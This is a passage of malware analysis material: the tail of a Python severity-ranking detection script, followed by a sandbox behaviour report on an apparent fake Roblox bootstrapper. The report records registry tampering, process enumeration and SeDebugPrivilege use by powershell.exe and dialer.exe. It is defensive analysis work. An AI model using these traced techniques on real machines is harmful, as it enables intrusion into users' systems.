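    order = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    ranked = {}
    for f in sorted(findings, key=lambda f: order[f.severity]):
        ranked.setdefault(f.path, f.severity)
    return ranked


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f"[{f.severity:8}] {f.rule:32} {f.path}  ({f.note})")
```

The six events produce six findings, with the two MRT.exe writes ranked first; feeding the same tuples from another sandbox run (or from Sysmon event ID 11 file-create records mapped to the same shape) reuses the rules unchanged.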

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Neoblox.exe = "11001" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718387624" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 5000310000000000cb5809ad10004c6f63616c003c0009000400efbecb582dabce58888e2e0000007057020000000100000000000000000000000000000022d73c004c006f00630061006c00000014000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c00434653461600310000000000cb582dab120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbecb582dabce58888e2e0000005c5702000000010000000000000000000000000000005162c0004100700070004400610074006100000042000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e00310000000000ce589b8e100054656d7000003a0009000400efbecb582dabce589b8e2e00000071570200000001000000000000000000000000000000a76bd000540065006d007000000014000000 C:\Windows\Explorer.EXE N/A
Key created \Registry\User\S-1-5-21-1276817940-128734381-631578427-1000_Classes\NotificationData C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000c69856df45bcda01e92560424abcda0150d68cae83beda0114000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "1" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000ce589b8e10004e656f626c6f7800400009000400efbece589b8ece589b8e2e0000004daa0200000001000000000000000000000000000000ef57dc004e0065006f0062006c006f007800000016000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
